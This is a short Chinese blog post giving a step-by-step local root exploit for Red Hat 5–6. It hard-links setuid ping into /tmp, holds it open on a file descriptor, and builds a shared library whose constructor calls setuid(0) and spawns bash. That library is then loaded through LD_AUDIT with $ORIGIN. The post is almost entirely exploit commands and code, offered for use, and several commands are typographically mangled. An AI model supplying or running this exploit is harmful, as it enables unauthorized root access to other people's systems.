Redhat利用漏洞提权

发布时间：2020-07-21 12:41:09 来源：网络阅读：4589 作者：jikecom 栏目：安全技术

漏洞试用系统：redhat 5—6通用

一.利用/tmp拥有777的权限

在/tmp下创建一个exploit目录

ln /bin/ping（ping命令的权限很特殊是S，可以在普通用户使用这个命令的时候瞬间拥有这个命令的属主权限，这里是root）

ln /bin/ping /tmp/exploit/target

exec 3< /tmp/exploit/target

rm -rf /tmp/exploit/

二.vim编写一段C语言程序（文件名payload.c）

void __attribute__((constructor)) init() //这里__是两个下划线

{

setuid(0);

system(“/bin/bash”);

}

使用GCC把这个文件编译一下

Gcc -w –fpic –shared –o /tmp/exploit payload.c

三.执行

LD_AUDIT=”\$ORIGIN” exec/proc/self/fd/3

向AI问一下细节

猜你喜欢